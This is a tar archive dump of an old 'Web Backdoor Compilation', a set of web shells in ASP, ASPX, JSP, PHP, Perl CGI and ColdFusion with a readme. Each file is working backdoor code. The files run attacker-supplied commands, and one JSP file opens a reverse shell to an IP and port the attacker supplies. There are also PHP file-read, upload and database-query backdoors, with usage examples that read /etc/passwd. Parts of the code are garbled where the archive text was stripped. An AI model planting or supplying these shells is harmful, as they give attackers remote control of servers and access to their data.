wbc-v1b/ 0000750 0001547 0001550 00000000000 10610167177 012420 5 ustar michaeld michaeld wbc-v1b/cmd-asp-5.1.asp 0000640 0001547 0001550 00000002260 10541534050 014742 0 ustar michaeld michaeld <% ' ASP Cmd Shell On IIS 5.1 ' brett.moore_at_security-assessment.com ' http://seclists.org/bugtraq/2006/Dec/0226.html Dim oS,oSNet,oFSys, oF,szCMD, szTF On Error Resume Next Set oS = Server.CreateObject("WSCRIPT.SHELL") Set oSNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form("C") If (szCMD <> "") Then szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() ' Here we do the command Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """",0,True) response.write szTF ' Change perms Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G everyone:F",0,True) Set oF = oFSys.OpenTextFile(szTF,1,False,0) End If %>
Machine: <%=oSNet.ComputerName%>
Username: <%=oSNet.UserName%>
<% If (IsObject(oF)) Then On Error Resume Next Response.Write Server.HTMLEncode(oF.ReadAll) oF.Close Call oS.Run("win.com cmd.exe /c del "& szTF,0,True) End If %> wbc-v1b/cmdasp.asp 0000640 0001547 0001550 00000002766 10541534062 014402 0 ustar michaeld michaeld <%@ Language=VBScript %> <% ' --------------------o0o-------------------- ' File: CmdAsp.asp ' Author: Maceo' Release: 2000-12-01 ' OS: Windows 2000, 4.0 NT ' ------------------------------------------- Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next ' -- create the COM objects that we will be using -- ' Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") ' -- check for a command that we have posted -- ' szCMD = Request.Form(".CMD") If (szCMD <> "") Then ' -- Use a poor man's pipe ... a temp file -- ' szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %><%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s; } } catch(IOException e) { e.printStackTrace(); } } %>
<% If (IsObject(oFile)) Then ' -- Read the output from our command and remove the temp file -- ' On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %> wbc-v1b/cmdjsp.jsp 0000640 0001547 0001550 00000001325 10541534276 014421 0 ustar michaeld michaeld // note that linux = cmd and windows = "cmd.exe /c + cmd"<%=output %>wbc-v1b/jsp-reverse.jsp 0000640 0001547 0001550 00000004623 10541534454 015410 0 ustar michaeld michaeld // backdoor.jsp // http://www.security.org.sg/code/jspreverse.html <%@ page import="java.lang.*, java.util.*, java.io.*, java.net.*" % > <%! static class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector(InputStream is, OutputStream os) { this.is = is; this.os = os; } public void run() { BufferedReader isr = null; BufferedWriter osw = null; try { isr = new BufferedReader(new InputStreamReader(is)); osw = new BufferedWriter(new OutputStreamWriter(os)); char buffer[] = new char[8192]; int lenRead; while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) { osw.write(buffer, 0, lenRead); osw.flush(); } } catch (Exception ioe) try { if(isr != null) isr.close(); if(osw != null) osw.close(); } catch (Exception ioe) } } %>JSP Backdoor Reverse Shell
<% String ipAddress = request.getParameter("ipaddress"); String ipPort = request.getParameter("port"); if(ipAddress != null && ipPort != null) { Socket sock = null; try { sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); Runtime rt = Runtime.getRuntime(); Process proc = rt.exec("cmd.exe"); StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream()); StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream()); outputConnector.start(); inputConnector.start(); } catch(Exception e) } %> wbc-v1b/php-backdoor.php 0000640 0001547 0001550 00000005360 10541533475 015510 0 ustar michaeld michaeld // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\ ob_implicit_flush(); if(isset($_REQUEST['f'])){ $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); fpassthru($file); die; } if(isset($_REQUEST['d'])){ $d=$_REQUEST['d']; echo ""; if ($handle = opendir("$d")) { echo ""; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd wbc-v1b/perlcmd.cgi 0000644 0001547 0001550 00000001111 10610162503 014515 0 ustar michaeld michaeld #!/usr/bin/perl -w use strict; print "Cache-Control: no-cache\n"; print "Content-type: text/html\n\n"; my $req = $ENV{QUERY_STRING}; chomp ($req); $req =~ s/%20/ /g; $req =~ s/%3b/;/g; print ""; print ''; if (!$req) { print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd"; } else { print "Executing: $req"; } print "listing of $d
"; while ($dir = readdir($handle)){ if (is_dir("$d/$dir")) echo ""; else echo ""; echo "$dir\n"; echo ""; } } else echo "opendir() failed"; closedir($handle); die ("
"); } if(isset($_REQUEST['c'])){ echo ""; system($_REQUEST['c']); die; } if(isset($_REQUEST['upload'])){ if(!isset($_REQUEST['dir'])) die('hey,specify directory!'); else $dir=$_REQUEST['dir']; $fname=$HTTP_POST_FILES['file_name']['name']; if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname)) die('file uploading error.'); } if(isset($_REQUEST['mquery'])){ $host=$_REQUEST['host']; $usr=$_REQUEST['usr']; $passwd=$_REQUEST['passwd']; $db=$_REQUEST['db']; $mquery=$_REQUEST['mquery']; mysql_connect("$host", "$usr", "$passwd") or die("Could not connect: " . mysql_error()); mysql_select_db("$db"); $result = mysql_query("$mquery"); if($result!=FALSE) echo "query was executed correctly
\n"; while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); mysql_free_result($result); die; } ?>
to browse go to http:// echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
for example: http:// echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix or http:// echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
execute mysql query: wbc-v1b/readme.txt 0000640 0001547 0001550 00000002375 10610167164 014422 0 ustar michaeld michaeld Web Backdoor Compilation (wbc) DK (http://michaeldaw.org) Changelog Date Change 14 Apr 07 Version 1b (pre 1.2 release): perlcmd.cgi, cfexec.cfm, cmdasp.aspx Dec/06 Version 1 release. I have collected some WEB backdoors in the past to exploit vulnerable file upload facilities and others. I think a library like this may be useful in a variety of situations. Understanding how these backdoors work can help security administrators implement firewalling and security policies to mitigate obvious attacks. The package includes: Filename Contributer MD5 cmd-asp-5.1.asp Brett Moore 8baa99666bf3734cbdfdd10088e0cd9f cmdasp.asp Maceo 57b51418a799d2d016be546f399c2e9b cmdasp.aspx Dominic Chell 5e83b6ed422399de04408b80f3e5470e cmdjsp.jsp Unknown b815611cc39f17f05a73444d699341d4 jsp-reverse.jsp Tan Chew Keong 8b0e6779f25a17f0ffb3df14122ba594 php-backdoor.php z0mbie 2b5cb105c4ea9b5ebc64705b4bd86bf7 simple-backdoor.php David Kierznowski f091d1b9274c881f8e41b2f96e6b9936 perlcmd.cgi David Kierznowski 97ae7222d7f13e908c6d7f563cb1e72b cfexec.cfm Kurt Grutzmacher bd04f47283c53ca0ce6436a79ccd600f Note: readme.txt is also included in this package but not listed here. If you have contributions please let me know so that I can add them into a later release. wbc-v1b/simple-backdoor.php 0000640 0001547 0001550 00000000510 10541536457 016205 0 ustar michaeld michaeld "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; my @cmd = `$req`; print ""; foreach my $line (@cmd) { print $line . "
"; } print ""; # wbc-v1b/cmdasp.aspx 0000644 0001547 0001550 00000002570 10610154643 014567 0 ustar michaeld michaeld <%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %>awen asp.net webshell wbc-v1b/cfexec.cfm 0000644 0001547 0001550 00000002405 10610154464 014345 0 ustar michaeld michaeld Notes:
- Prefix DOS commands with "c:\windows\system32\cmd.exe /c <command>" or wherever cmd.exe is
- Options are, of course, the command line options you want to run
- CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
#myVar#